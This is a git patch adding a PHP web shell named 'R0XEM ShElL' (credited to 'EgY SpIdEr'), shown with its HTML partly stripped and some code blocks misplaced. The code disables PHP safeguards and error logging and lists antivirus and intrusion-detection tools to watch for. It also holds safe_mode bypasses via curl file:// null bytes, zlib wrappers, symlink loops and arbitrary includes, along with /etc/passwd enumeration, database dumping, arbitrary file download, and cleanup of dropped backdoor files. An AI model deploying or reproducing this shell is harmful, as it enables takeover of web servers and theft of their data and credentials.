From 972c5ec68c015a4e1662704ba1fe8307dfd051d7 Mon Sep 17 00:00:00 2001 From: Anthony Cozamanis Date: Tue, 6 Oct 2015 15:25:11 +0800 Subject: [PATCH 1/2] Added R0XEM ShElL --- php/R0XEM ShElL.php | 6485 +++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 6485 insertions(+) create mode 100644 php/R0XEM ShElL.php diff --git a/php/R0XEM ShElL.php b/php/R0XEM ShElL.php new file mode 100644 index 0000000..f635af7 --- /dev/null +++ b/php/R0XEM ShElL.php @@ -0,0 +1,6485 @@ + $val) { + if (!isset($tacfg[$key])) $tacfg[$key] = $val; +} + + +if (!$tacfg['ownsessions']) { + session_name('txtauth'); + session_start(); +} + + +// Logout attempt made. Deletes any remember-me cookie as well +if (isset($_GET['logout']) || isset($_POST['logout'])) { + setcookie('txtauth_'.$rmgroup, '', time()-86400*14); + if (!$tacfg['ownsessions']) { + $_SESSION = array(); + session_destroy(); + } + else $_SESSION['txtauthin'] = false; +} +// Login attempt made +elseif (isset($_POST['login'])) { + if ($_POST['uname'] == $tacfg['uname'] && $_POST['pword'] == $tacfg['pword']) { + $_SESSION['txtauthin'] = true; + if ($_POST['rm']) { + // Set remember-me cookie for 2 weeks + setcookie('txtauth_'.$rmgroup, md5($tacfg['uname'].$tacfg['pword']), time()+86400*14); + } + } + else $err = 'Login Faild !'; +} +// Remember-me cookie exists +elseif (isset($_COOKIE['txtauth_'.$rmgroup])) { + if (md5($tacfg['uname'].$tacfg['pword']) == $_COOKIE['txtauth_'.$rmgroup] && $tacfg['allowrm']) { + $_SESSION['txtauthin'] = true; + } + else $err = 'Login Faild !'; +} +if (!$_SESSION['txtauthin']) { +@ini_restore("safe_mode"); +@ini_restore("open_basedir"); +@ini_restore("safe_mode_include_dir"); +@ini_restore("safe_mode_exec_dir"); +@ini_restore("disable_functions"); +@ini_restore("allow_url_fopen"); + + +@ini_set('error_log',NULL); +@ini_set('log_errors',0); +?> + + + +<?=$tacfg['title']?> + + + +'; + + + +

+
+

+

+ +
+

+ +

+
+ +':''?> + + + + + + + + + +
'.$err.'
User:
Password:
+
+
+
+
+ + +

+
+
Developed by + EgY SpIdEr · copyright © + & EgY SpIdEr
+ + + + + +Login As () Logout

+
+Not Found");} + + +$language='eng'; + + +$auth = 0; + + +$name='7d1f6442a9ed59e62f93dcbc2695baa6'; +$pass='7d1f6442a9ed59e62f93dcbc2695baa6'; + + +//ru_RU, //ru_RU.cp1251, //ru_RU.iso88595, //ru_RU.koi8r, //ru_RU.utf8 +@setlocale(LC_ALL,'ru_RU.cp1251'); + + +@ini_restore("safe_mode"); +@ini_restore("open_basedir"); +@ini_restore("safe_mode_include_dir"); +@ini_restore("safe_mode_exec_dir"); +@ini_restore("disable_functions"); +@ini_restore("allow_url_fopen"); + + +if(@function_exists('ini_set')) + { + @ini_set('error_log',NULL); + @ini_set('log_errors',0); + @ini_set('file_uploads',1); + @ini_set('allow_url_fopen',1); + } +else + { + @ini_alter('error_log',NULL); + @ini_alter('log_errors',0); + @ini_alter('file_uploads',1); + @ini_alter('allow_url_fopen',1); + } + +error_reporting(E_ALL); + + +/* ??? ????? */ +$userful = array('gcc',', lcc',', cc',', ld',', php',', perl',', python',', ruby',', make',', tar',', gzip',', bzip',', bzip2',', nc',', locate',', suidperl'); +$danger = array(', kav',', nod32',', bdcored',', uvscan',', sav',', drwebd',', clamd',', rkhunter',', chkrootkit',', iptables',', ipfw',', tripwire',', shieldcc',', portsentry',', snort',', ossec',', lidsadm',', tcplodg',', sxid',', logcheck',', logwatch',', sysmask',', zmbscap',', sawmill',', wormscan',', ninja'); +$tempdirs = array(@ini_get('session.save_path').'/',@ini_get('upload_tmp_dir').'/','/tmp/','/dev/shm/','/var/tmp/'); +$downloaders = array('wget','fetch','lynx','links','curl','get'); + + +/* ??? ?????? ???????? ???? ????? 
realpath() */ +//$chars_rlph = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"; +//$chars_rlph = "_-.01234567890abcdefghijklnmopqrstuvwxyz"; +//$chars_rlph = "_-.ABCDEFGHIJKLMNOPQRSTUVWXYZ"; +//$chars_rlph = "_-.abcdefghijklnmopqrstuvwxyz"; +//$chars_rlph = "_-.01234567890"; +$chars_rlph = "abcdefghijklnmopqrstuvwxyz"; + + +$presets_rlph = array('index.php','.htaccess','.htpasswd','httpd.conf','vhosts.conf','cfg.php','config.php','config.inc.php','config.default.php','config.inc.php', +'shadow','passwd','.bash_history','.mysql_history','master.passwd','user','admin','password','administrator','phpMyAdmin','security','php.ini','cdrom','root', +'my.cnf','pureftpd.conf','proftpd.conf','ftpd.conf','resolv.conf','login.conf','smb.conf','sysctl.conf','syslog.conf','access.conf','accounting.log','home','htdocs', +'access','auth','error','backup','data','back','sysconfig','phpbb','phpbb2','vbulletin','vbullet','phpnuke','cgi-bin','html','robots.txt','billing'); + + +/******************************************************************************************************/ + + +define("starttime",@getmicrotime()); + + +if((!@function_exists('ini_get')) || (@ini_get('open_basedir')!=NULL) || (@ini_get('safe_mode_include_dir')!=NULL)){$open_basedir=1;} else{$open_basedir=0;}; + + +set_magic_quotes_runtime(0); +@set_time_limit(0); +if(@function_exists('ini_set')) + { + @ini_set('max_execution_time',0); + @ini_set('output_buffering',0); + } +else + { + @ini_alter('max_execution_time',0); + @ini_alter('output_buffering',0); + } +$safe_mode = @ini_get('safe_mode'); +#if(@function_exists('ini_get')){$safe_mode = @ini_get('safe_mode');}else{$safe_mode=1;}; +$version = '1.42'; +if(@version_compare(@phpversion(), '4.1.0') == -1) + { + $_POST = &$HTTP_POST_VARS; + $_GET = &$HTTP_GET_VARS; + $_SERVER = &$HTTP_SERVER_VARS; + $_COOKIE = &$HTTP_COOKIE_VARS; + } +if (@get_magic_quotes_gpc()) + { + foreach ($_POST as $k=>$v) + { + $_POST[$k] = stripslashes($v); + } + 
foreach ($_COOKIE as $k=>$v) + { + $_COOKIE[$k] = stripslashes($v); + } + } + + +if($auth == 1) { +if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass) + { + header('WWW-Authenticate: Basic realm="HELLO!"'); + header('HTTP/1.0 401 Unauthorized'); + exit("

Access Denied

"); + } +} + + +if(!isset($_COOKIE['tempdir'],$_COOKIE['select_tempdir'])) { + $tempdir='./'; + $select_tempdir = ''; +}else{ + if(isset($_POST['tempdir'])){$tempdir = $_POST['tempdir'];}else{$tempdir = $_COOKIE['tempdir'];} + $select_tempdir = $_COOKIE['select_tempdir']; +} + + +$head = ' + + + + + + +EgY_SpIdEr ShElL + + + + + + + +'; +class zipfile +{ + var $datasec = array(); + var $ctrl_dir = array(); + var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; + var $old_offset = 0; + function unix2DosTime($unixtime = 0) { + $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); + if ($timearray['year'] < 1980) { + $timearray['year'] = 1980; + $timearray['mon'] = 1; + $timearray['mday'] = 1; + $timearray['hours'] = 0; + $timearray['minutes'] = 0; + $timearray['seconds'] = 0; + } + return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | + ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); + } + function addFile($data, $name, $time = 0) + { + $name = str_replace('\\', '/', $name); + $dtime = dechex($this->unix2DosTime($time)); + $hexdtime = '\x' . $dtime[6] . $dtime[7] + . '\x' . $dtime[4] . $dtime[5] + . '\x' . $dtime[2] . $dtime[3] + . '\x' . $dtime[0] . $dtime[1]; + eval('$hexdtime = "' . $hexdtime . 
'";'); + $fr = "\x50\x4b\x03\x04"; + $fr .= "\x14\x00"; + $fr .= "\x00\x00"; + $fr .= "\x08\x00"; + $fr .= $hexdtime; + $unc_len = strlen($data); + $crc = crc32($data); + $zdata = gzcompress($data); + $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); + $c_len = strlen($zdata); + $fr .= pack('V', $crc); + $fr .= pack('V', $c_len); + $fr .= pack('V', $unc_len); + $fr .= pack('v', strlen($name)); + $fr .= pack('v', 0); + $fr .= $name; + $fr .= $zdata; + $this -> datasec[] = $fr; + $cdrec = "\x50\x4b\x01\x02"; + $cdrec .= "\x00\x00"; + $cdrec .= "\x14\x00"; + $cdrec .= "\x00\x00"; + $cdrec .= "\x08\x00"; + $cdrec .= $hexdtime; + $cdrec .= pack('V', $crc); + $cdrec .= pack('V', $c_len); + $cdrec .= pack('V', $unc_len); + $cdrec .= pack('v', strlen($name) ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('V', 32 ); + $cdrec .= pack('V', $this -> old_offset ); + $this -> old_offset += strlen($fr); + $cdrec .= $name; + $this -> ctrl_dir[] = $cdrec; + } + function file() + { + $data = implode('', $this -> datasec); + $ctrldir = implode('', $this -> ctrl_dir); + return + $data . + $ctrldir . + $this -> eof_ctrl_dir . + pack('v', sizeof($this -> ctrl_dir)) . + pack('v', sizeof($this -> ctrl_dir)) . + pack('V', strlen($ctrldir)) . + pack('V', strlen($data)) . 
+ "\x00\x00"; + } +} + + +function compress(&$filename,&$filedump,$compress) + { + global $content_encoding; + global $mime_type; + if ($compress == 'bzip' && @function_exists('bzcompress')) + { + $filename .= '.bz2'; + $mime_type = 'application/x-bzip2'; + $filedump = bzcompress($filedump); + } + else if ($compress == 'gzip' && @function_exists('gzencode')) + { + $filename .= '.gz'; + $content_encoding = 'x-gzip'; + $mime_type = 'application/x-gzip'; + $filedump = gzencode($filedump); + } + else if ($compress == 'zip' && @function_exists('gzcompress')) + { + $filename .= '.zip'; + $mime_type = 'application/zip'; + $zipfile = new zipfile(); + $zipfile -> addFile($filedump, substr($filename, 0, -4)); + $filedump = $zipfile -> file(); + } + else + { + $mime_type = 'application/octet-stream'; + } + } + + +function moreread($temp){ +global $lang,$language; +$str=''; + if(@function_exists('fopen')&&@function_exists('feof')&&@function_exists('fgets')&&@function_exists('feof')&&@function_exists('fclose') && ($ffile = @fopen($temp, "r"))){ + if($ffile){ + while(!@feof($ffile)){$str .= @fgets($ffile);}; + fclose($ffile); + } + }elseif(@function_exists('fopen')&&@function_exists('fread')&&@function_exists('fclose')&&@function_exists('filesize')&&($ffile = @fopen($temp, "r"))){ + if($ffile){ + $str = @fread($ffile, @filesize($temp)); + @fclose($ffile); + } + }elseif(@function_exists('file')&&($ffiles = @file($temp))){ + foreach ($ffiles as $ffile) { $str .= $ffile; } + }elseif(@function_exists('file_get_contents')){ + $str = @file_get_contents($temp); + }elseif(@function_exists('readfile')){ + $str = @readfile($temp); + }elseif(@function_exists('highlight_file')){ + $str = @highlight_file($temp); + }elseif(@function_exists('show_source')){ + $str = @show_source($temp); + }else{echo $lang[$language.'_text56'];} +return $str; +} + + +function readzlib($filename,$temp=''){ +global $lang,$language; +$str=''; + if(!$temp) {$temp=tempnam(@getcwd(), "copytemp");}; + 
if(@copy("compress.zlib://".$filename, $temp)) { + $str = moreread($temp); + } else echo $lang[$language.'_text119']; + @unlink($temp); +return $str; +} + + +function morewrite($temp,$str='') +{ +global $lang,$language; + if(@function_exists('fopen') && @function_exists('fwrite') && @function_exists('fclose') && ($ffile=@fopen($temp,"wb"))){ + if($ffile){ + @fwrite($ffile,$str); + @fclose($ffile); + } + }elseif(@function_exists('fopen') && @function_exists('fputs') && @function_exists('fclose') && ($ffile=@fopen($temp,"wb"))){ + if($ffile){ + @fputs($ffile,$str); + @fclose($ffile); + } + }elseif(@function_exists('file_put_contents')){ + @file_put_contents($temp,$str); + }else return 0; +return 1; +} + + +function mailattach($to,$from,$subj,$attach) + { + $headers = "From: $from\r\n"; + $headers .= "MIME-Version: 1.0\r\n"; + $headers .= "Content-Type: ".$attach['type']; + $headers .= "; name=\"".$attach['name']."\"\r\n"; + $headers .= "Content-Transfer-Encoding: base64\r\n\r\n"; + $headers .= chunk_split(base64_encode($attach['content']))."\r\n"; + if(mail($to,$subj,"",$headers)) { return 1; } + return 0; + } +class my_sql + { + var $host = 'localhost'; + var $port = ''; + var $user = ''; + var $pass = ''; + var $base = ''; + var $db = ''; + var $connection; + var $res; + var $error; + var $rows; + var $columns; + var $num_rows; + var $num_fields; + var $dump; + + function connect() + { + switch($this->db) + { + case 'MySQL': + if(empty($this->port)) { $this->port = '3306'; } + if(!@function_exists('mysql_connect')) return 0; + $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass); + if(is_resource($this->connection)) return 1; + break; + case 'MSSQL': + if(empty($this->port)) { $this->port = '1433'; } + if(!@function_exists('mssql_connect')) return 0; + $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass); + if($this->connection) return 1; + break; + case 'PostgreSQL': + if(empty($this->port)) { 
$this->port = '5432'; } + $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'"; + if(!@function_exists('pg_connect')) return 0; + $this->connection = @pg_connect($str); + if(is_resource($this->connection)) return 1; + break; + case 'Oracle': + if(!@function_exists('ocilogon')) return 0; + $this->connection = @ocilogon($this->user, $this->pass, $this->base); + if(is_resource($this->connection)) return 1; + break; + case 'MySQLi': + if(empty($this->port)) { $this->port = '3306'; } + if(!@function_exists('mysqli_connect')) return 0; + $this->connection = @mysqli_connect($this->host,$this->user,$this->pass,$this->base,$this->port); + if(is_resource($this->connection)) return 1; + break; + case 'mSQL': + if(!@function_exists('msql_connect')) return 0; + $this->connection = @msql_connect($this->host.':'.$this->port,$this->user,$this->pass); + if(is_resource($this->connection)) return 1; + break; + case 'SQLite': + if(!@function_exists('sqlite_open')) return 0; + $this->connection = @sqlite_open($this->base); + if(is_resource($this->connection)) return 1; + break; + } + return 0; + } + + function select_db() + { + switch($this->db) + { + case 'MySQL': + if(@mysql_select_db($this->base,$this->connection)) return 1; + break; + case 'MSSQL': + if(@mssql_select_db($this->base,$this->connection)) return 1; + break; + case 'PostgreSQL': + return 1; + break; + case 'Oracle': + return 1; + break; + case 'MySQLi': + return 1; + break; + case 'mSQL': + if(@msql_select_db($this->base,$this->connection)) return 1; + break; + case 'SQLite': + return 1; + break; + } + return 0; + } + + function query($query) + { + $this->res=$this->error=''; + switch($this->db) + { + case 'MySQL': + if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection))) + { + $this->error = @mysql_error($this->connection); + return 0; + } + else if(is_resource($this->res)) { return 1; } + return 2; + break; + case 
'MSSQL': + if(false===($this->res=@mssql_query($query,$this->connection))) + { + $this->error = 'Query error'; + return 0; + } + else if(@mssql_num_rows($this->res) > 0) { return 1; } + return 2; + break; + case 'PostgreSQL': + if(false===($this->res=@pg_query($this->connection,$query))) + { + $this->error = @pg_last_error($this->connection); + return 0; + } + else if(@pg_num_rows($this->res) > 0) { return 1; } + return 2; + break; + case 'Oracle': + if(false===($this->res=@ociparse($this->connection,$query))) + { + $this->error = 'Query parse error'; + } + else + { + if(@ociexecute($this->res)) + { + if(@ocirowcount($this->res) != 0) return 2; + return 1; + } + $error = @ocierror(); + $this->error=$error['message']; + } + break; + case 'MySQLi': + if(false===($this->res=@mysqli_query($this->connection,$query))) + { + $this->error = @mysqli_error($this->connection); + return 0; + } + else if(is_resource($this->res)) { return 1; } + return 2; + break; + case 'mSQL': + if(false===($this->res=@msql_query($query,$this->connection))) + { + $this->error = @msql_error($this->connection); + return 0; + } + else if(is_resource($this->res)) { return 1; } + return 2; + break; + case 'SQLite': + if(false===($this->res=@sqlite_query($this->connection,$query))) + { + $this->error = @sqlite_error_string($this->connection); + return 0; + } + else if(is_resource($this->res)) { return 1; } + return 2; + break; + } + return 0; + } + function get_result() + { + $this->rows=array(); + $this->columns=array(); + $this->num_rows=$this->num_fields=0; + switch($this->db) + { + case 'MySQL': + $this->num_rows=@mysql_num_rows($this->res); + $this->num_fields=@mysql_num_fields($this->res); + while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res))); + @mysql_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + case 'MSSQL': + $this->num_rows=@mssql_num_rows($this->res); + $this->num_fields=@mssql_num_fields($this->res); + 
while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res))); + @mssql_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}; + break; + case 'PostgreSQL': + $this->num_rows=@pg_num_rows($this->res); + $this->num_fields=@pg_num_fields($this->res); + while(false !== ($this->rows[] = @pg_fetch_assoc($this->res))); + @pg_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + case 'Oracle': + $this->num_fields=@ocinumcols($this->res); + while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++; + @ocifreestatement($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + case 'MySQLi': + $this->num_rows=@mysqli_num_rows($this->res); + $this->num_fields=@mysqli_num_fields($this->res); + while(false !== ($this->rows[] = @mysqli_fetch_assoc($this->res))); + @mysqli_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + case 'mSQL': + $this->num_rows=@msql_num_rows($this->res); + $this->num_fields=@msql_num_fields($this->res); + while(false !== ($this->rows[] = @msql_fetch_array($this->res))); + @msql_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + case 'SQLite': + $this->num_rows=@sqlite_num_rows($this->res); + $this->num_fields=@sqlite_num_fields($this->res); + while(false !== ($this->rows[] = @sqlite_fetch_array($this->res))); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + } + return 0; + } + function dump($table) + { + if(empty($table)) return 0; + $this->dump=array(); + $this->dump[0] = '##'; + $this->dump[1] = '## --------------------------------------- '; + $this->dump[2] = '## Created: '.date ("d/m/Y H:i:s"); + $this->dump[3] = '## Database: '.$this->base; + $this->dump[4] = '## Table: '.$table; + $this->dump[5] = '## 
--------------------------------------- '; + switch($this->db) + { + case 'MySQL': + $this->dump[0] = '## MySQL dump'; + if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0; + if(!$this->get_result()) return 0; + $this->dump[] = $this->rows[0]['Create Table']; + $this->dump[] = '## --------------------------------------- '; + if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);} + $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'MSSQL': + $this->dump[0] = '## MSSQL dump'; + if($this->query('SELECT * FROM '.$table)!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} + $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'PostgreSQL': + $this->dump[0] = '## PostgreSQL dump'; + if($this->query('SELECT * FROM '.$table)!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} + $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'Oracle': + $this->dump[0] = '## ORACLE dump'; + if($this->query('SELECT * FROM '.$table)!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} + $this->dump[] = 'INSERT INTO '.$table.' 
('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'MySQLi': + $this->dump[0] = '## MySQLi dump'; + if($this->query('SELECT * FROM '.$table)!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysqli_real_escape_string($v);} + $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'mSQL': + $this->dump[0] = '## mSQL dump'; + if($this->query('SELECT * FROM '.$table)!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} + $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'SQLite': + $this->dump[0] = '## SQLite dump'; + if($this->query('SELECT * FROM '.$table)!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} + $this->dump[] = 'INSERT INTO '.$table.' 
('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + default: + return 0; + break; + } + return 1; + } + function close() + { + switch($this->db) + { + case 'MySQL': + @mysql_close($this->connection); + break; + case 'MSSQL': + @mssql_close($this->connection); + break; + case 'PostgreSQL': + @pg_close($this->connection); + break; + case 'Oracle': + @oci_close($this->connection); + break; + case 'MySQLi': + @mysqli_close($this->connection); + break; + case 'mSQL': + @msql_close($this->connection); + break; + case 'SQLite': + @sqlite_close($this->connection); + break; + } + } + function affected_rows() + { + switch($this->db) + { + case 'MySQL': + return @mysql_affected_rows($this->res); + break; + case 'MSSQL': + return @mssql_affected_rows($this->res); + break; + case 'PostgreSQL': + return @pg_affected_rows($this->res); + break; + case 'Oracle': + return @ocirowcount($this->res); + break; + case 'MySQLi': + return @mysqli_affected_rows($this->res); + break; + case 'mSQL': + return @msql_affected_rows($this->res); + break; + case 'SQLite': + return @sqlite_changes($this->res); + break; + default: + return 0; + break; + break; +case 'cURL': + if(empty($_POST['egy_spider'])){ + + + + +} else { +$curl=$_POST['egy_spider']; +$ch =curl_init("file:///".$curl."\x00/../../../../../../../../../../../../".__FILE__); +curl_exec($ch); +var_dump(curl_exec($ch)); +echo ""; + + +} +break; +case 'copy': + + +if(empty($snn)){ +if(empty($_GET['snn'])){ +if(empty($_POST['snn'])){ + + +} else { +$u1p=$_POST['snn']; +} +} else { +$u1p=$_GET['snn']; +} +} + $u1p=""; // File to Include... 
or use _GET _POST +$tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp + + + + +$temp=tempnam($tymczas, "cx"); + + +if(copy("compress.zlib://".$snn, $temp)){ +$zrodlo = fopen($temp, "r"); +$tekst = fread($zrodlo, filesize($temp)); +fclose($zrodlo); +echo "".htmlspecialchars($tekst).""; +unlink($temp); +echo ""; +} +break; +case 'ini_restore': + if(empty($_POST['ini_restore'])){ +} else { + + +$ini=$_POST['ini_restore']; +echo ini_get("safe_mode"); +echo ini_get("open_basedir"); +require_once("$ini"); +ini_restore("safe_mode"); +ini_restore("open_basedir"); +echo ini_get("safe_mode"); +echo ini_get("open_basedir"); +include($_GET["egy"]); +echo ""; +} +break; +case 'glob': +function reg_glob() +{ +$chemin=$_REQUEST['glob']; +$files = glob("$chemin*"); + + + + +foreach ($files as $filename) { + + + echo "$filename\n"; + + +} +} + + +if(isset($_REQUEST['glob'])) +{ +reg_glob(); +} + + +break; + case 'sym1': + if(empty($_POST['sym1p'])){ + } else { +$symp=$_POST['sym1p']; + } + if(empty($_POST['sym1p2'])){ + + +} else { +$symp2=$_POST['sym1p2']; + + + symlink("a/a/a/a/a/a/", "dummy"); +symlink("dummy".$symp2."".$symp."", "xxx"); +unlink("dummy"); +while (1) { +symlink(".", "dummy"); + + + } + } + break; + case 'sym2': + @include(xxx); + + + break; + case 'plugin': + if ($_POST['plugin'] ){ + + + + + for($uid=0;$uid<60000;$uid++){ //cat /etc/passwd + $ara = posix_getpwuid($uid); + if (!empty($ara)) { + while (list ($key, $val) = each($ara)){ + print "$val:"; + } + print "\n"; + } + } + echo ""; + } + + + } + } + } +if(isset($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name'])) + { + if($file=moreread($_POST['d_name'])){ $filedump = $file; } + else if ($file=readzlib($_POST['d_name'])) { $filedump = $file; } else { err(1,$_POST['d_name']); $_POST['cmd']=""; } + if(!empty($_POST['cmd'])) + { + @ob_clean(); + $filename = @basename($_POST['d_name']); + $content_encoding=$mime_type=''; + 
compress($filename,$filedump,$_POST['compress']); + if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); } + header("Content-type: ".$mime_type); + header("Content-disposition: attachment; filename=\"".$filename."\";"); + echo $filedump; + exit(); + } + } +if(isset($_GET['1'])) { echo @phpinfo(); echo "
[ BACK ]
"; die(); } +if (isset($_POST['cmd']) && $_POST['cmd']=="db_query") + { + echo $head; + $sql = new my_sql(); + $sql->db = $_POST['db']; + $sql->host = $_POST['db_server']; + $sql->port = $_POST['db_port']; + $sql->user = $_POST['mysql_l']; + $sql->pass = $_POST['mysql_p']; + $sql->base = $_POST['mysql_db']; + $querys = @explode(';',$_POST['db_query']); + echo ''; + if(!$sql->connect()) echo "
Can't connect to SQL server
"; + else + { + if(!empty($sql->base)&&!$sql->select_db()) echo "
Can't select database
"; + else + { + foreach($querys as $num=>$query) + { + if(strlen($query)>5) + { + echo "Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."
"; + switch($sql->query($query)) + { + case '0': + echo "
Error : ".$sql->error."
"; + break; + case '1': + if($sql->get_result()) + { + echo ""; + foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES); + $keys = @implode(" "; + for($i=0;$i<$sql->num_rows;$i++) + { + foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES); + $values = @implode(" '; + } + echo "
 ", $sql->columns); + echo "
 ".$keys." 
 ",$sql->rows[$i]); + echo '
 '.$values.' 
"; + } + break; + case '2': + $ar = $sql->affected_rows()?($sql->affected_rows()):('0'); + echo "
affected rows : ".$ar."

"; + break; + } + } + } + } + } + echo "
"; + echo in('hidden','db',0,$_POST['db']); + echo in('hidden','db_server',0,$_POST['db_server']); + echo in('hidden','db_port',0,$_POST['db_port']); + echo in('hidden','mysql_l',0,$_POST['mysql_l']); + echo in('hidden','mysql_p',0,$_POST['mysql_p']); + echo in('hidden','mysql_db',0,$_POST['mysql_db']); + echo in('hidden','cmd',0,'db_query'); + echo "
"; + echo "Base: base."\">
"; + echo "


"; + echo "
"; + echo "
[ BACK ]
"; die(); + } +if(isset($_GET['12'])) + { + @unlink(__FILE__); + } +if(isset($_GET['11'])) + { + @unlink($tempdir.'bdpl'); + @unlink($tempdir.'back'); + @unlink($tempdir.'bd'); + @unlink($tempdir.'bd.c'); + @unlink($tempdir.'dp'); + @unlink($tempdir.'dpc'); + @unlink($tempdir.'dpc.c'); + @unlink($tempdir.'prxpl'); + @unlink($tempdir.'grep.txt'); + } +if(isset($_GET['2'])) +{ +echo $head; +function U_value($value) + { + if ($value == '') return 'no value'; + if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE'; + if ($value === null) return 'NULL'; + if (@is_object($value)) $value = (array) $value; + if (@is_array($value)) + { + @ob_start(); + print_r($value); + $value = @ob_get_contents(); + @ob_end_clean(); + } + return U_wordwrap((string) $value); + } +function U_wordwrap($str) + { + $str = @wordwrap(@htmlspecialchars($str), 100, '', true); + return @preg_replace('!(&[^;]*)([^;]*;)!', '$1$2', $str); + } +if (@function_exists('ini_get_all')) + { + $r = ''; + echo '', ''; + foreach (@ini_get_all() as $key=>$value) + { + $r .= ''; + } + echo $r; + echo '
Directive
Local Value
Master Value
'.ws(3).''.$key.'
'.U_value($value['local_value']).'
'.U_value($value['global_value']).'
'; + } +echo "
[ BACK ]
"; +die(); +} +if(isset($_GET['3'])) + { + echo $head; + echo '
CPU
'; + $cpuf = @file("cpuinfo"); + if($cpuf) + { + $c = @sizeof($cpuf); + for($i=0;$i<$c;$i++) + { + $info = @explode(":",$cpuf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= ''; + } + echo $r; + } + else + { + echo ''; + } + echo '
'.ws(3).''.trim($info[0]).'
'.trim($info[1]).'
'.ws(3).'
---
'; + echo "
[ BACK ]
"; + die(); + } +if(isset($_GET['4'])) + { + echo $head; + echo '
MEMORY
'; + $memf = @file("meminfo"); + if($memf) + { + $c = sizeof($memf); + for($i=0;$i<$c;$i++) + { + $info = explode(":",$memf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= ''; + } + echo $r; + } + else + { + echo ''; + } + echo '
'.ws(3).''.trim($info[0]).'
'.trim($info[1]).'
'.ws(3).'
---
'; + echo "
[ BACK ]
"; + die(); + } + + + + + if(isset($_GET['tool'])) { echo @phpinfo(); echo "
[ BACK ]
"; die(); } + if(isset($_GET['tools'])) { /*########################################### +code 2 +###########################################*/ +?> + +EgY SpIdEr ShElL + + + +";$ef=""; +$st=""; +$et="
